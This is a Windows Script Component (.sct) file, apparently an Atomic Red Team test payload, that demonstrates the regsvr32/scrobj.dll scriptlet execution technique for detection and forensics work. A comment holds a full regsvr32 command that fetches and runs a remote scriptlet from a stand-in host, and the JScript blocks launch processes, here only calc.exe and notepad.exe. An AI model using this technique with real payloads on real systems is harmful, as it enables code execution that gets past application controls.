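<?xml version="1.0"?>
<scriptlet>
<!-- Windows Script Component (.sct) kept as a proof-of-concept test payload.
     Two execution points exist in this file: the script inside <registration>
     launches calc.exe, and the public Exec() method launches notepad.exe.
     Both are placeholder commands; for detection/DFIR purposes the relevant
     artifacts are the regsvr32 + scrobj.dll invocation and the browser-cache
     file path recorded in the comments below. -->
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    >
    <!-- Observed invocation that loads this scriptlet: -->
    <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll -->
    <!-- DFIR -->
    <!-- .sct files are downloaded and executed from a path like this -->
    <!-- Though, the name and extension are arbitrary. -->
    <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
    <!-- Based on current research, no registry keys are written, since the invocation above uses the uninstall switch (/u) -->

    <!-- Proof Of Concept - Casey Smith @subTee -->
    <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
    <script language="JScript">
    <![CDATA[
        // Registration-time script block; the command is a benign placeholder.
        // For detection: the child process is spawned by whichever host loaded
        // this scriptlet, presumably regsvr32.exe with scrobj.dll (see the
        // invocation comment above) - confirm in a lab before writing rules.
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]>
    </script>
</registration>

<public>
    <!-- Declares Exec() as the component's single public method. -->
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    // Implementation of the public method declared in <public> above.
    // Benign placeholder command; same host-process considerations as the
    // registration script apply.
    function Exec()
    {
        var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
    }
]]>
</script>
</scriptlet>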